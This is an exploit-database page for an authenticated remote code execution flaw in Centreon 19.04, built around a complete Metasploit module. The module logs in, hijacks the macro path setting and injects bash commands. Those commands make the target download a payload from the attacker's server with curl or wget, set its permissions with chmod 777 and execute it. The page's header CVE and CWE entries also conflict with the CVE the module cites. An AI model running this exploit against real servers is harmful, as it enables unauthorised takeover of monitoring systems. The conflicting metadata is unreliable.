Exploitalert - Database of Exploits

Centreon 19.04 Authenticated Remote Code Execution (Metasploit)

CVE	Category	Price	Severity
CVE-2020-26948	CWE-422	$5000	Critical

Author	Risk	Exploitation Type	Date
Metasploit	Critical	Remote	2020-01-20

CPE
cpe:cpe:/a:centreon:centreon:19.04

CVSS	EPSS	EPSSP
CVSS:3.7/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	High	AC	The successful attack depends on the evasion or circumvention of security-enhancing techniques in place that would otherwise hinder the attack. These include: Evasion of exploit mitigation techniques. The attacker must have additional methods available to bypass security measures in place. For example, circumvention of address space randomization (ASLR) or data execution prevention must be performed for the attack to be successful. Obtaining target-specific secrets. The attacker must gather some target-specific secret before the attack can be successful. A secret is any piece of information that cannot be obtained through any amount of reconnaissance. To obtain the secret the attacker must perform additional attacks or break otherwise secure measures (e.g. knowledge of a secret key may be needed to break a crypto channel). This operation must be performed for each attacked target.
Privileges Required	Low	PR	The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	Low	C	There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity	Low	I	Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability	Low	A	There is reduced performance or interruptions in resource availability. However, the attacker does not have the ability to completely prevent access to the resources or services; the impact is limited.

https://cxsecurity.com/ascii/WLB-2020010149

Centreon 19.04 Authenticated Remote Code Execution (Metasploit)

#################################################################### # This module requires Metasploit: https://metasploit.com/download # # Current source: https://github.com/rapid7/metasploit-framework # #################################################################### class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, "Name" => "Centreon Authenticated Macro Expression Location Setting Handler Code Execution", "Description" => %q{ Authenticated Remote Code Execution on Centreon Web Appliances. Affected versions: =< 18.10, 19.04 By amending the Macros Expression's default directory to / we are able to execute system commands and obtain a shell as user Apache. Vendor verified: 09/17/2019 Vendor patched: 10/16/2019 Public disclosure: 10/18/2019 }, "License" => MSF_LICENSE, 'Author' => [ 'TheCyberGeek', # Discovery 'enjsloezz' # Discovery and Metasploit Module ], 'References' => [ ['URL','https://github.com/centreon/centreon/pull/7864'], ['CVE','2019-16405'] ], "Platform" => "linux", "Targets" => [ ["Centreon", {}], ], "Stance" => Msf::Exploit::Stance::Aggressive, "Privileged" => false, "DisclosureDate" => "Oct 19 2019", "DefaultOptions" => { "SRVPORT" => 80, }, "DefaultTarget" => 0 )) register_options( [ OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]), OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]), OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]), OptString.new("TARGETS", [true, "The method used to download shell from target (default is curl)", "curl"]), OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]), ] ) end def exploit begin res = send_request_cgi( "uri" => normalize_uri(target_uri.path, "index.php"), "method" => "GET", ) @phpsessid = res.get_cookies /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body unless token vprint_error("Couldn't get token, check your TARGETURI") return end res = send_request_cgi!( "uri" => normalize_uri(target_uri.path, "index.php"), "method" => "POST", "cookie" => @phpsessid, "vars_post" => { "useralias" => datastore["USERNAME"], "password" => datastore["PASSWORD"], "centreon_token" => token, }, ) unless res.body.include? "You need to enable JavaScript to run this app" fail_with Failure::NoAccess "Cannot login to Centreon" end print_good("Login Successful!") res = send_request_cgi( "uri" => normalize_uri(target_uri.path, "main.get.php"), "method" => "GET", "cookie" => @phpsessid, "vars_get" => { "p" => "60904", "o" => "c", "resource_id" => 1, }, ) /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body res = send_request_cgi( "uri" => normalize_uri(target_uri.path, "main.get.php"), "vars_get" => { "p" => "60904", }, "method" => "POST", "cookie" => @phpsessid, "vars_post" => { "resource_name": "$USER1$", "resource_line": "/", "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": "" "a:0:{}" "", "centreon_token": token }, ) begin Timeout.timeout(datastore["HTTPDELAY"]) { super } rescue Timeout::Error vprint_error("Server Timed Out...") end rescue ::Rex::ConnectionError vprint_error("Connection error...") end end def primer @pl = generate_payload_exe @path = service.resources.keys[0] binding_ip = srvhost_addr proto = ssl ? "https" : "http" payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}" send_payload(payload_uri) end def send_payload(payload_uri) payload = "/bin/bash -c \"" + ( datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}\"" print_good("Sending Payload") send_request_cgi( "uri" => normalize_uri(target_uri.path, "main.get.php"), "method" => "POST", "cookie" => @phpsessid, "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 }, ) end def on_request_uri(cli, req) print_good("#{peer} - Payload request received: #{req.uri}") send_response(cli, @pl) run_shell stop_service end def run_shell print_good("Setting permissions for the payload") res = send_request_cgi( "uri" => normalize_uri(target_uri.path, "main.get.php"), "method" => "POST", "cookie" => @phpsessid, "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"", "o": "p", "min": 1, }, ) print_good("Executing Payload") res = send_request_cgi( "uri" => normalize_uri(target_uri.path, "main.get.php"), "method" => "POST", "cookie" => @phpsessid, "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": "/tmp/#{@path}", "o": "p", "min": 1, }, ) end end

Impressum